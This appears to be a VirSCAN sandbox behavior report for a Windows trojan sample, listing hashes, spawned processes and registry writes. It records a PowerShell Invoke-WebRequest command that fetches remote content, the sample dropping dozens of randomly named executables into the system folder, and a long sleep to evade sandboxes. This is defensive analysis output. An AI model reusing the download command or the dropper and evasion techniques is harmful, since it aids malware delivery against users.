VirSCAN VirSCAN

1, Ви можете надсилати файли для перевірки розміром не більше 20 мб.
2, VirSCAN перевіряє Rar/Zip файли, але не більше 20-ти файлів.
3, VirSCAN може перевіряти заархівовані файли з наступними паролями 'infected' або 'virus'.
4, Якщо ваш переглядач не може вивантажити файли, будь ласка, звантажити вивантаження VirSCAN.

Мова
Завантаження сервера
Server Load
VirSCAN
VirSCAN

1, Ви можете надсилати файли для перевірки розміром не більше 20 мб.
2, VirSCAN перевіряє Rar/Zip файли, але не більше 20-ти файлів.
3, VirSCAN може перевіряти заархівовані файли з наступними паролями 'infected' або 'virus'.

Основна інформація

Ім'я файлу: 00谁都有秘密
Розмір файлу: 2068136
Тип файлу: application/x-dosexec
MD5: 41fd78c21175a7e58ea1946742610061
sha1: 1a88fa944bea19dc091cecd28096a5f5b596e42d

 CreateProcess

ApplicationName:
CmdLine: powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
childid: 2144
childname: powershell.exe
childpath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
drop_type:
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\pVvHVXx.exe
childid: 2776
childname: pVvHVXx.exe
childpath: C:\Windows\system\pVvHVXx.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\XIunuLE.exe
childid: 1936
childname: XIunuLE.exe
childpath: C:\Windows\system\XIunuLE.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\jXGapzX.exe
childid: 1836
childname: jXGapzX.exe
childpath: C:\Windows\system\jXGapzX.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\tGqMkEe.exe
childid: 2236
childname: tGqMkEe.exe
childpath: C:\Windows\system\tGqMkEe.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\WYAFryj.exe
childid: 2260
childname: WYAFryj.exe
childpath: C:\Windows\system\WYAFryj.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\tEyUWct.exe
childid: 1840
childname: tEyUWct.exe
childpath: C:\Windows\system\tEyUWct.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\QTrpNtY.exe
childid: 2160
childname: QTrpNtY.exe
childpath: C:\Windows\system\QTrpNtY.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\YuFgYGd.exe
childid: 1628
childname: YuFgYGd.exe
childpath: C:\Windows\system\YuFgYGd.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\bjmXdBD.exe
childid: 1476
childname: bjmXdBD.exe
childpath: C:\Windows\system\bjmXdBD.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\CLeZCRX.exe
childid: 952
childname: CLeZCRX.exe
childpath: C:\Windows\system\CLeZCRX.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\GWAmqsL.exe
childid: 2472
childname: GWAmqsL.exe
childpath: C:\Windows\system\GWAmqsL.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\QPZwHlA.exe
childid: 2040
childname: QPZwHlA.exe
childpath: C:\Windows\system\QPZwHlA.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\FiebfRo.exe
childid: 2832
childname: FiebfRo.exe
childpath: C:\Windows\system\FiebfRo.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\nfHJuJN.exe
childid: 1880
childname: nfHJuJN.exe
childpath: C:\Windows\system\nfHJuJN.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\TyMjkQV.exe
childid: 2368
childname: TyMjkQV.exe
childpath: C:\Windows\system\TyMjkQV.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\loAnxnj.exe
childid: 2428
childname: loAnxnj.exe
childpath: C:\Windows\system\loAnxnj.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\evVewtT.exe
childid: 2608
childname: evVewtT.exe
childpath: C:\Windows\system\evVewtT.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\soaakCH.exe
childid: 2764
childname: soaakCH.exe
childpath: C:\Windows\system\soaakCH.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\cepsWcl.exe
childid: 1216
childname: cepsWcl.exe
childpath: C:\Windows\system\cepsWcl.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\dKYPoTY.exe
childid: 1612
childname: dKYPoTY.exe
childpath: C:\Windows\system\dKYPoTY.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\LAoljGR.exe
childid: 2932
childname: LAoljGR.exe
childpath: C:\Windows\system\LAoljGR.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\ZChGZRz.exe
childid: 2680
childname: ZChGZRz.exe
childpath: C:\Windows\system\ZChGZRz.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\nVqBEZq.exe
childid: 1580
childname: nVqBEZq.exe
childpath: C:\Windows\system\nVqBEZq.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\vfTeZBV.exe
childid: 2648
childname: vfTeZBV.exe
childpath: C:\Windows\system\vfTeZBV.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\sjvOSaD.exe
childid: 2636
childname: sjvOSaD.exe
childpath: C:\Windows\system\sjvOSaD.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\xHbIQiT.exe
childid: 1860
childname: xHbIQiT.exe
childpath: C:\Windows\system\xHbIQiT.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\eazKPGK.exe
childid: 2356
childname: eazKPGK.exe
childpath: C:\Windows\system\eazKPGK.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\STZCYrB.exe
childid: 2704
childname: STZCYrB.exe
childpath: C:\Windows\system\STZCYrB.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine:
childid: 2440
childname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
childpath: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
drop_type:
name:
noNeedLine:
path:
pid: 1928

 Summary

buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList

 Behavior_analysis

message: 企图通过长时间休眠躲避沙箱检测
name: 长时间休眠
szSubkey:
score: 2

 Dropped_Save

analysis_result: 安全
create: 0
how: move
md5: f9038ec966b89c3ed51c156bd54fe14b
name: 590aee7bdd69b59b.customDestinations-ms
new_size: 7960bytes
operation: 拷贝覆盖文件
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
processid: 2144
processname: powershell.exe
sha1: 5c51a2d53285cf47905ffd529193167501cad241
sha256: 4db7d9f14e08e9dd52ef96e8feac91e54d2b10631967061847d00f05ca709706
size: 7960
this_path: /data/cuckoo/storage/analyses/2000083/files/1018/590aee7bdd69b59b.customDestinations-ms
type: data

 Dropped Unsave

analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 7d0afac75731dd35f2a611f4e551bae4
name: pVvHVXx.exe
new_size: 2019KB (2068136bytes)
operation: 修改文件
path: C:\Windows\system\pVvHVXx.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 33dafeb6e3a943e9eef3bc5075b9fea134d65f22
